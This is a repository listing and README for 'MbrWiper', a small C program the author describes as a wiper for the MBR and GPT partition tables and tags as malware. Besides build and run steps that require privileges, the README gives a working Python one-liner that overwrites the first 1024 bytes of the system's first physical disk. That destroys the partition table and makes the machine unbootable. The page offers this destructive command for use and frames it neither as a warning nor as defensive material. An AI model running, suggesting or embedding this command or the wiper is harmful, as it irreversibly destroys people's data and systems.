https://github.com/mauricelambert/mbrwiper
This repository implements a little MBR and GPT Wiper.
https://github.com/mauricelambert/mbrwiper
diskkill dos gpt gptwiper malware mbr mbrwiper
Last synced: 3 months ago
JSON representation
This repository implements a little MBR and GPT Wiper.
- Host: GitHub
- URL: https://github.com/mauricelambert/mbrwiper
- Owner: mauricelambert
- License: gpl-3.0
- Created: 2025-01-29T11:15:48.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-04-22T06:21:43.000Z (over 1 year ago)
- Last Synced: 2026-01-01T00:26:15.855Z (7 months ago)
- Topics: diskkill, dos, gpt, gptwiper, malware, mbr, mbrwiper
- Language: C
- Homepage:
- Size: 29.3 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.txt
Awesome Lists containing this project
README

# MbrWiper
## Description
This file implements a little MBR and GPT Wiper.
## Requirements
- No requirements
## Download
[Download binaries (Linux and Windows Libraries and examples) from latest github release](https://github.com/mauricelambert/MbrWiper/releases/latest).
## Compile
### Download sources
```bash
git clone https://github.com/mauricelambert/MbrWiper.git
cd MbrWiper
```
#### Windows
```bash
gcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper.exe
strip MbrWiper
```
#### Linux
```bash
gcc -Wall -Wextra -Werror -O5 MbrWiper.c -o MbrWiper
strip MbrWiper
```
## Usages
**Privileges required**
### Linux
```bash
./MbrWiper
```
### Windows
```bash
MbrWiper.exe
```
## MBR and GPT Wiper in python oneliner
```python
open("\\\\.\\PHYSICALDRIVE0", "rb+").write(b"a" * 1024)
```
## Links
- [Github](https://github.com/mauricelambert/MbrWiper/)
- [Github - compiled executable](https://github.com/mauricelambert/MbrWiper/releases/latest/)
- [SourceForce - compiled executable](https://sourceforge.net/projects/MbrWiper/files/)
## Licence
Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).